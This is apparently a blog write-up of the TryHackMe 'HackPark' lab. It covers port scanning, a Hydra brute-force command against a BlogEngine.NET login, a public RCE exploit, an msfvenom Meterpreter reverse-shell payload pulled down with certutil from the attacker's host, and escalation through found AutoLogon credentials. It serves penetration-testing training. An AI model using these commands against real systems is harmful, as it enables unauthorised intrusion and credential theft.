TryHackMe – HackPark Writeup

HackPark is a Medium difficulty room, although it guides you along fairly well for the initial foothold, and it's pretty easy to root if you do proper basic enumeration.

Initial Enumeration

The first step in any pentest situation is enumeration. It's important to get as much information about the machine and its users as possible. To start off, we'll use Nmap to perform a port scan and see what services are active and listening on the box. Nmap is a versitle tool, and many people have their own preferred methods to balance speed and accuracy, but here are the options I'll use.

Using these options, we're left with the following command:

nmap -sC -sV -vv -Pn -oN nmap-initial.txt 10.10.97.88

This machine is surprising quiet considering it's a Windows machine. We get two open ports: 80 and 3389. Nmap detects port 80 running Microsoft IIS and 3389 hosting Remote Desktop.

Investigating the web server on port 80, we find a simple blog with a single post. A little bit of poking around reveals that the site is powered by ASPX, which is pretty common for an IIS server. The site seems to be powered by BlogEngine.NET.

Brute Force

There's a login form accessible from the site's main menu, so we'll try a brute force attack against that to see if the password happens to be vulnerable. Usernames are revealed by BlogEngine through a feature that lets you see all posts by a specific user. The username appears to be “Admin”, which would have been an easily guessable username anyway.

We'll use Hydra for our brute force attack. There's a lot of junk we need to tack onto the requests we send to the form, but the main points to note are that ctl00%24MainContent%24LoginUser%24UserName is the username field and ctl00%24MainContent%24LoginUser%24Password is the password field. We know the password was wrong if we get a “Login failed” message, so we'll tell Hydra to look for that string.

hydra -l Admin -P /usr/share/wordlists/rockyou.txt 10.10.97.88 http-post-form '/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=E2OPdwooQYKBe3hHmFyHa%2Bf42FNOA%2B0i3IfPFd2E6QX4ZFLFHeNhaurK%2BkcrI5TnLLXMiFxKO8IoF2PNUe4yxUE00Ypa1Fw9vUIoNSabbCRy2tPdaEfUccXF3nsmyHtUxFdrxb6w%2FLJ5tv5p5Uo5e4FqjE6fJOA3%2FYKOPDlZ9V38FMGP&__EVENTVALIDATION=x4B7wKhqtjq9qtvOm0hyFmAk48Vm4da4a79DWyJ1XRt6%2BGfR%2BQEE2Pfw9lQ7O0mrmbTenxGMb8si9MEfKGEXDxVPHW99J1XBzWlK7G5Hl11sx5J9sWQwIwtNAFx8skqv9lVGaynV%2BGp5CV81h3etCvc60o8Yu0m5nCeTk2o5BNZTNaEx&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed'

Hydra sucessfully finds the password for us, giving us access to the site's admin panel.

Remote Code Execution

The “About” section gives us a version number of 3.3.6.0. Conveniently, there happens to be a useful vulnerability with an exploit available on Exploit-DB. The author was kind enough to give fairly detailed instructions within the script.

Following the instructions in the exploit, we'll set our attacking machine's IP in the script and use BlogEngine's post editor to upload it as PostView.ascx. Then we'll leverage a path traversal vulnerability to get BlogEngine to execute our code and give us a reverse shell. We land as a lowly IIS worker user.

This particular Windows reverse shell really sucks and is supposedly unstable, so upgrading to something a bit more attacker-friendly would be nice. We'll throw together an MSFVenom payload to give us a nice Meterpreter shell.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.13.14.52 LPORT=9001 -f exe > shell.exe

Unfortunately, getting PowerShell to work through this garbage shell is more work than I care to put in, so we'll try out the Certutil method for downloading our file to the target machine (Thanks, HackTricks).

certutil.exe -urlcache -split -f "http://10.13.14.52:8000/shell.exe" shell.exe

Privilege Escalation

To give us a good starting point, we'll try running WinPEAS on the machine and see what it can find for us. A handful of interesting results come back.

    Some AutoLogon credentials were found
    DefaultUserName               :  administrator
    DefaultPassword               :  *************
    AWSLiteAgent(Amazon Inc. - AWS Lite Guest Agent)[C:\Program Files\Amazon\XenTools\LiteAgent.exe] - Auto - Running - No quotes and Space detected
    AWS Lite Guest Agent
   =================================================================================================
    WindowsScheduler(Splinterware Software Solutions - System Scheduler Service)[C:\PROGRA~2\SYSTEM~1\WService.exe] - Auto - Running
    File Permissions: Everyone [WriteData/CreateFiles]
    Possible DLL Hijacking in binary folder: C:\Program Files (x86)\SystemScheduler (Everyone [WriteData/CreateFiles])
    System Scheduler Service Wrapper
   =================================================================================================

The unquoted service path lands in a folder we probably don't have access to, so it's unlikely that we'll be able to take advantage of that. The DLL hijack is promising, but will also take a bit of legwork to set up. The AutoLogon credentials are the most baindead easy possibility of getting access, so we'll try those first.

Order 66

Surprisingly, it just works, and we end up with an admin RDP session. From there we're able to grab both of the flags without issue.

The intended method is using write access to the SystemScheduler folder to overwrite an executable and get a second reverse shell (technically an EXE hijack as opposed to a DLL hijack), but the RDP method is just so much more painless.

#tryhackme #pentesting #cybersecurity

Surfshark Affiliate Link

$0.99 domains from Namecheap (affiliate link)